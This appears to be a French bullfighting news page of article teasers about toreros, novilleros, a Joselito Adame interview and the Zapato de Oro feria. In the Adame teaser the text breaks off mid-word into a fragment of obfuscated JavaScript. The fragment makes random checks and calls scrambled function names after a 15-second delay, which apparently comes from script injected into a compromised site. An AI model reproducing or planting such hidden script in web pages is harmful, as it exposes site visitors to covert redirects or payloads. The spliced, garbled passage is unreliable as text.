ROBERTO DOMÍNGUEZ

Etre et rester. D’abord, portant le costume de lumières ; ensuite, en excellant dans le métier de consultant taurin et pour finir en conjuguant de façon exemplaire cette double facette de

LE TRESOR DE L’ILE

Vendredi dernier on a présenté à Séville le programme, qui se tient tout au long de cette semaine à Villamanrique de la Condesa –ville natale du torero- pour célébrer le

VAREA

Les bilans de fin de saison l’oublieront peut-être. Pourtant Juan Varea est l’une des révélations de la saison qui s’achève. Avec à son compteur 12 novilladas, l’enfant de Castellon qui a

DE SIX EN SIX

Octobre est arrivé et les « seul contre six » se sont multipliés. Ce fut d’abord Miguel Abellán devant du bétail du Puerto de San Lorenzo pendant la Feria d’Automne de Madrid ;

ENTRETIEN AVEC JOSELITO ADAME

Le torero d’Aguascalalientes est le seul torero mexicain à être présent aujourd’hui dans toutes les grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if

AVEC ZAPATO OU SANS ZAPATO

La feria des novilladas du Zapato de Oro s’est achevée. Quinze novilleros sont passés par là. Parmi eux, certains se sont distingués : Ginés Marín –récompensé finalement avec le trophée- et